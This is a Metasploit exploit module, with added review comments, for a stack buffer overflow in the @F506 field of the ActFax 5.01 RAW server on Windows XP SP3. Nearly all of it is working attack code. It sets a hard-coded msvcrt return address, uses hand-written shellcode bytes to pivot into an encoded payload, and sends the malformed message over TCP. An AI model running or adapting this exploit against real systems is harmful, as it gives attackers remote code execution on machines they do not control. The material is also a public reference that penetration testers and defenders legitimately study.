##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Remote exploit module for the ActFax 5.01 RAW server (see 'Name' and
# 'Description' below). The module's only network activity is in #exploit:
# one TCP connection, one "@F506 ..." message, then disconnect.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (name, references, payload constraints and
  # the single target) with the framework through update_info.
  #
  # @param info [Hash] metadata supplied by the framework; merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ActFax 5.01 RAW Server Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW
          Server can be used to transfer fax messages without any underlying protocols. To
          note significant fields in the fax being transferred, like the fax number or the
          recipient, ActFax data fields can be used. This module exploits a buffer overflow
          in the handling of the @F506 fields due to the insecure usage of strcpy. This
          module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Craig Freyman', # @cd1zz # discovery and Metasploit module
          'corelanc0d3r', # Metasploit module
          'juan vazquez' # Metasploit module cleanup
        ],
        'References' => [
          [ 'OSVDB', '89944' ],
          [ 'BID', '57789' ],
          [ 'EDB', '24467' ],
          [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ]
        ],
        'Platform' => 'win',
        'Payload' => {
          # 0x00-0x1f plus 0x40 ('@'). '@' is the field delimiter that #exploit
          # wraps the buffer in ("@F506 " ... "@"), so the encoder must not emit it.
          'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40",
          'DisableNops' => true,
          # Equals the target 'Offset' below. #exploit pads the buffer with
          # Offset - payload.length bytes, so 'Space' must never exceed 'Offset'
          # or that length goes negative.
          'Space' => 1024,
          # The encoder is told the payload start will be in ECX when it runs;
          # the "mov ecx, esp / add ecx, ..." stub appended in #exploit is what
          # establishes that.
          'EncoderOptions' =>
          {
            'BufferRegister' => 'ECX'
          }
        },
        'Targets' => [
          [
            'ActFax 5.01 / Windows XP SP3',
            {
              # Hard-coded msvcrt.dll address, so it is only valid for the
              # XP SP3 build named in this target (the description says the
              # English build was tested); presumably why no other target exists.
              'Ret' => 0x77c35459, # push esp # ret # msvcrt.dll
              'Offset' => 1024
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-02-05',
        'DefaultTarget' => 0,
        # NOTE(review): all three are still UNKNOWN_*; the description claims a
        # successful test on XP SP3, so at least Reliability could be stated.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Sends the single malformed RAW-server message. Wire format as built below:
  #
  #   "@F506 " + [payload][random padding up to Offset][Ret][stub] + "@\r\n\r\n"
  #
  # i.e. an @F506 field value well over 1024 bytes. A legitimate field value
  # is presumably far shorter, which makes the field length a usable detection
  # signal on the RAW server port.
  #
  # @return [void]
  def exploit
    connect
    p = payload.encoded
    # NOTE(review): buffer aliases p (same String object), so every << below
    # also mutates whatever payload.encoded returned; if the framework caches
    # that string, `p.dup` would be the safer starting point — confirm.
    buffer = p
    # Padding length relies on 'Space' (1024) == 'Offset'; see initialize.
    buffer << rand_text(target['Offset'] - p.length)
    buffer << [target.ret].pack("V")
    # Stub reached via Ret (push esp # ret); it is what puts the payload
    # address in ECX for 'BufferRegister' => 'ECX'.
    buffer << "\x89\xe1" # mov ecx, esp
    buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028
    buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500
    buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042
    print_status("Trying target #{target.name}...")
    # '@' delimits the field, hence 0x40 in the payload BadChars.
    sock.put("@F506 " + buffer + "@\r\n\r\n")
    disconnect
  end
end